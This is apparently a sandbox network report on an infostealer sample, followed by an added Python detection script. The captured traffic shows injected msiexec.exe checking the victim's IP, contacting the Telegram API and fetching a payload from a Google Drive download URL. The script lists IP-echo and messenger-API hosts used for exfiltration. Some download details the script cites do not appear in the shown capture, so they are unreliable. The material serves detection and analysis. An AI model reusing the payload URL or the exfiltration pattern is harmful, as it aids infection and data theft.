Dec 17, 2024 12:06:11.707459927 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.717835903 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.717951059 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.721329927 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.721396923 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.735202074 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.735270023 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.738549948 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.738657951 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.755029917 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.755109072 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.758449078 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.758538961 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.759563923 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.759628057 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.766932964 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.767033100 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.772044897 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.772138119 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.772202969 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.772294998 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.786508083 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.786602974 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.811130047 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.811194897 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.811223030 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.811323881 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.838836908 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.840344906 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.840372086 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.840486050 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.841198921 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.841329098 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.846120119 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.846266985 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.846271992 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.846383095 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.850275040 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.852258921 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.852273941 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.852369070 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.860449076 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.860543966 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.860584974 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.860652924 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.860666990 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.860733986 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.871205091 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.872822046 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.872840881 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.872967005 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.881993055 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.882180929 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.882191896 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.882271051 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.892332077 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.892376900 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.892414093 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.892472982 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.902120113 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.902175903 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.902247906 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.902299881 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.912290096 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.912441969 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.912462950 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.912508011 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.922426939 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.922509909 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.922560930 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.922884941 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.932462931 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.932521105 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.932549953 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.932609081 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.942718029 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.942774057 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.942837000 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.942893982 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.952667952 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.952721119 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.952788115 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.952857971 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.962629080 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.962687016 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.962712049 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.962762117 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.971848965 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.971910000 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.971939087 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.971988916 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.980539083 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.980614901 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.980663061 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.980726004 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.980772972 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.980834007 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.980890989 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:11.980972052 CET | 443 | 49819 | 142.250.181.1 | 192.168.2.5
Dec 17, 2024 12:06:11.981215954 CET | 49819 | 443 | 192.168.2.5 | 142.250.181.1
Dec 17, 2024 12:06:12.773257971 CET | 49834 | 80 | 192.168.2.5 | 193.122.130.0
Dec 17, 2024 12:06:12.893707991 CET | 80 | 49834 | 193.122.130.0 | 192.168.2.5
Dec 17, 2024 12:06:12.893862009 CET | 49834 | 80 | 192.168.2.5 | 193.122.130.0
Dec 17, 2024 12:06:12.894372940 CET | 49834 | 80 | 192.168.2.5 | 193.122.130.0
Dec 17, 2024 12:06:13.014380932 CET | 80 | 49834 | 193.122.130.0 | 192.168.2.5
Dec 17, 2024 12:06:17.262450933 CET | 80 | 49834 | 193.122.130.0 | 192.168.2.5
Dec 17, 2024 12:06:17.269424915 CET | 49834 | 80 | 192.168.2.5 | 193.122.130.0
Dec 17, 2024 12:06:17.390891075 CET | 80 | 49834 | 193.122.130.0 | 192.168.2.5
Dec 17, 2024 12:06:20.590322971 CET | 80 | 49834 | 193.122.130.0 | 192.168.2.5
Dec 17, 2024 12:06:20.639801025 CET | 49834 | 80 | 192.168.2.5 | 193.122.130.0
Dec 17, 2024 12:06:26.311580896 CET | 49834 | 80 | 192.168.2.5 | 193.122.130.0
Dec 17, 2024 12:06:26.431647062 CET | 80 | 49834 | 193.122.130.0 | 192.168.2.5
Dec 17, 2024 12:06:26.661261082 CET | 80 | 49834 | 193.122.130.0 | 192.168.2.5
Dec 17, 2024 12:06:26.702351093 CET | 49834 | 80 | 192.168.2.5 | 193.122.130.0
Dec 17, 2024 12:06:26.891762018 CET | 49867 | 443 | 192.168.2.5 | 149.154.167.220
Dec 17, 2024 12:06:26.891778946 CET | 443 | 49867 | 149.154.167.220 | 192.168.2.5
Dec 17, 2024 12:06:26.891860962 CET | 49867 | 443 | 192.168.2.5 | 149.154.167.220
Dec 17, 2024 12:06:26.893800974 CET | 49867 | 443 | 192.168.2.5 | 149.154.167.220
Dec 17, 2024 12:06:26.893811941 CET | 443 | 49867 | 149.154.167.220 | 192.168.2.5
Dec 17, 2024 12:06:28.269702911 CET | 443 | 49867 | 149.154.167.220 | 192.168.2.5
Dec 17, 2024 12:06:28.269889116 CET | 49867 | 443 | 192.168.2.5 | 149.154.167.220
Dec 17, 2024 12:06:28.271820068 CET | 49867 | 443 | 192.168.2.5 | 149.154.167.220
Dec 17, 2024 12:06:28.271833897 CET | 443 | 49867 | 149.154.167.220 | 192.168.2.5
Dec 17, 2024 12:06:28.272219896 CET | 443 | 49867 | 149.154.167.220 | 192.168.2.5
                                                                                                  Dec 17, 2024 12:06:28.275780916 CET49867443192.168.2.5149.154.167.220
                                                                                                  Dec 17, 2024 12:06:28.323333025 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:28.323496103 CET49867443192.168.2.5149.154.167.220
                                                                                                  Dec 17, 2024 12:06:28.323510885 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:29.129879951 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:29.129966974 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:29.130109072 CET49867443192.168.2.5149.154.167.220
                                                                                                  Dec 17, 2024 12:06:29.131406069 CET49867443192.168.2.5149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 12:06:03.550915003 CET | 56315 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 12:06:03.689093113 CET | 53 | 56315 | 1.1.1.1 | 192.168.2.5
Dec 17, 2024 12:06:06.572205067 CET | 55572 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 12:06:06.710455894 CET | 53 | 55572 | 1.1.1.1 | 192.168.2.5
Dec 17, 2024 12:06:12.628402948 CET | 51947 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 12:06:12.768290043 CET | 53 | 51947 | 1.1.1.1 | 192.168.2.5
Dec 17, 2024 12:06:26.663752079 CET | 54568 | 53 | 192.168.2.5 | 1.1.1.1
Dec 17, 2024 12:06:26.890739918 CET | 53 | 54568 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 12:06:03.550915003 CET | 192.168.2.5 | 1.1.1.1 | 0x9403 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:06:06.572205067 CET | 192.168.2.5 | 1.1.1.1 | 0x1299 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:06:12.628402948 CET | 192.168.2.5 | 1.1.1.1 | 0x2dc0 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:06:26.663752079 CET | 192.168.2.5 | 1.1.1.1 | 0x6c02 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 12:06:03.689093113 CET | 1.1.1.1 | 192.168.2.5 | 0x9403 | No error (0) | drive.google.com | | 172.217.19.174 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:06:06.710455894 CET | 1.1.1.1 | 192.168.2.5 | 0x1299 | No error (0) | drive.usercontent.google.com | | 142.250.181.1 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:06:12.768290043 CET | 1.1.1.1 | 192.168.2.5 | 0x2dc0 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 17, 2024 12:06:12.768290043 CET | 1.1.1.1 | 192.168.2.5 | 0x2dc0 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:06:12.768290043 CET | 1.1.1.1 | 192.168.2.5 | 0x2dc0 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:06:12.768290043 CET | 1.1.1.1 | 192.168.2.5 | 0x2dc0 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:06:12.768290043 CET | 1.1.1.1 | 192.168.2.5 | 0x2dc0 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:06:12.768290043 CET | 1.1.1.1 | 192.168.2.5 | 0x2dc0 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 12:06:26.890739918 CET | 1.1.1.1 | 192.168.2.5 | 0x6c02 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49834 | 193.122.130.0 | 80 | 5064 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 12:06:12.894372940 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 17, 2024 12:06:17.262450933 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 11:06:17 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 80fcafc65f836670cab9583eb034cf3a
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 12:06:17.269424915 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 17, 2024 12:06:20.590322971 CET | 745 | IN | HTTP/1.1 504 Gateway Time-out
    Date: Tue, 17 Dec 2024 11:06:20 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
    X-Request-ID: e5a3481c2c67b28c4ab16a6a82f3e4f4
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
    Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 17, 2024 12:06:26.311580896 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 17, 2024 12:06:26.661261082 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 11:06:26 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 1df681c7e6d35ef9846814b0a13c8d89
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
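The session above is the pattern a stealer leaves in a capture: injected code in msiexec.exe asks checkip.dyndns.org for the victim's public address with a hard-coded MSIE 6.0 user-agent, and fourteen seconds later the same host resolves api.telegram.org. The Python below is an added example and is not part of the Joe Sandbox report or of the sample; it turns those records into checks a SOC could run against a proxy or DNS log: it parses the captured request and flags the IP-echo lookup, the legacy user-agent and the unusual client process, correlates the DNS timeline for an IP-echo query followed by a messenger-API query, and triages the drive.usercontent.google.com download shown in the proxied HTTPS session that follows by its headers, magic bytes and entropy. The sample records are transcribed from the tables on this page; the host lists, user-agent regex, correlation window and entropy threshold are assumptions chosen for illustration.

```python
"""Detection and triage over the network indicators recorded in this report.

Added example; not part of the Joe Sandbox report or of the sample. The
records below are transcribed from the DNS and HTTP tables on this page.
The host lists, user-agent pattern, time window and entropy threshold are
assumptions chosen for illustration.
"""
import math
import re
from datetime import datetime, timedelta

# Public IP-echo services stealers query to learn the victim's address (assumed list).
IP_ECHO_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com", "api.ipify.org", "icanhazip.com"}
# Messenger APIs commonly abused as exfiltration channels (assumed list).
EXFIL_API_HOSTS = {"api.telegram.org", "discord.com", "discordapp.com"}
# Pre-2010 browser string still hard-coded in many .NET stealer builds (assumed pattern).
LEGACY_UA = re.compile(r"Mozilla/4\.0 \(compatible; MSIE [5-8]\.0;")

# Records transcribed from this report.
CHECKIP_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)\r\n"
    "Host: checkip.dyndns.org\r\nConnection: Keep-Alive\r\n\r\n"
)
DNS_QUERIES = [  # (timestamp, queried name) from the DNS query table
    ("Dec 17, 2024 12:06:03.550915003 CET", "drive.google.com"),
    ("Dec 17, 2024 12:06:06.572205067 CET", "drive.usercontent.google.com"),
    ("Dec 17, 2024 12:06:12.628402948 CET", "checkip.dyndns.org"),
    ("Dec 17, 2024 12:06:26.663752079 CET", "api.telegram.org"),
]
DOWNLOAD_RESPONSE = (  # headers of the drive.usercontent.google.com reply
    "HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
    'Content-Disposition: attachment; filename="hsISdySQ90.bin"\r\n'
    "Content-Length: 93760\r\n\r\n"
)
DOWNLOAD_HEAD = bytes.fromhex(  # first 65 bytes of the body, from its first Data Raw row
    "1b d9 0e d9 fc 81 5a 63 a1 ed 7b 3d fd c3 c1 14 e5 83 a5 92 05 6a 71 5a fe 30 d3 74 5b 32 2f 8d"
    " 8b 45 2c a8 9e b8 00 a6 aa ca d1 3a b1 8e ab c3 e2 35 24 91 ba 26 f4 a8 36 24 f3 e1 62 97 16 5b ff"
)


def parse_http_message(raw):
    """Split a raw HTTP/1.x request or response into its start line and a
    dict of lower-cased header names; any body after the blank line is ignored."""
    lines = raw.splitlines()
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers}


def parse_joe_timestamp(text):
    """'Dec 17, 2024 12:06:12.628402948 CET' -> datetime. The zone suffix is
    dropped and nanoseconds are truncated to the microseconds strptime accepts."""
    stamp, _zone = text.rsplit(" ", 1)
    base, frac = stamp.split(".")
    return datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def flag_ip_echo_request(raw_request, process):
    """Reasons an HTTP request looks like a stealer's public-IP lookup ([] if none)."""
    msg = parse_http_message(raw_request)
    host = msg["headers"].get("host", "").lower()
    if host not in IP_ECHO_HOSTS:
        return []
    reasons = [f"request to IP-echo service {host}"]
    if LEGACY_UA.search(msg["headers"].get("user-agent", "")):
        reasons.append("legacy MSIE user-agent")
    if process.lower().endswith("msiexec.exe"):
        reasons.append("sent by msiexec.exe rather than a browser (common injection host)")
    return reasons


def find_exfil_sequence(queries, window=timedelta(minutes=5)):
    """IP-echo lookup followed within `window` by a messenger-API lookup: the
    usual stealer order (learn the victim's IP, then report it). Returns
    (echo_host, exfil_host, seconds_between) tuples."""
    stamped = [(parse_joe_timestamp(t), name.lower()) for t, name in queries]
    hits = []
    for t_echo, echo in stamped:
        if echo not in IP_ECHO_HOSTS:
            continue
        for t_api, api in stamped:
            if api in EXFIL_API_HOSTS and t_echo <= t_api <= t_echo + window:
                hits.append((echo, api, (t_api - t_echo).total_seconds()))
    return hits


def shannon_entropy(data):
    """Bits per byte. For short buffers compare against log2(len), not 8."""
    if not data:
        return 0.0
    counts = [data.count(b) for b in set(data)]
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts)


def triage_download(raw_response, body_head):
    """Header and content checks on a fetched payload; returns human-readable notes."""
    hdr = parse_http_message(raw_response)["headers"]
    notes = []
    if hdr.get("content-type") == "application/octet-stream" and ".bin" in hdr.get("content-disposition", ""):
        notes.append("opaque .bin attachment served as application/octet-stream")
    if body_head[:2] != b"MZ":
        notes.append("no MZ header: not a PE, consistent with an encrypted or packed stage")
    ceiling = math.log2(min(len(body_head), 256)) if len(body_head) > 1 else 1.0
    if shannon_entropy(body_head) / ceiling > 0.9:  # assumed threshold
        notes.append("near-maximal entropy for its length: encrypted or compressed data")
    return notes


if __name__ == "__main__":
    print(flag_ip_echo_request(CHECKIP_REQUEST, r"C:\Windows\SysWOW64\msiexec.exe"))
    print(find_exfil_sequence(DNS_QUERIES))
    print(triage_download(DOWNLOAD_RESPONSE, DOWNLOAD_HEAD))
```

The entropy check is deliberately normalised against log2(len) rather than against 8 bits, because a 65-byte head can never reach 8 bits per byte and a fixed threshold would miss it; on the full 93760-byte body the same ratio works unchanged. High entropy alone is also produced by compression, so it is reported alongside the missing MZ header and the opaque attachment rather than as a verdict by itself.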


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49813 | 172.217.19.174 | 443 | 5064 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 11:06:05 UTC | 216 | OUT | GET /uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
2024-12-17 11:06:06 UTC | 1920 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Tue, 17 Dec 2024 11:06:06 GMT
    Location: https://drive.usercontent.google.com/download?id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ&export=download
    Strict-Transport-Security: max-age=31536000
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-RuMcL-yuGwh16nvUoBtF8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
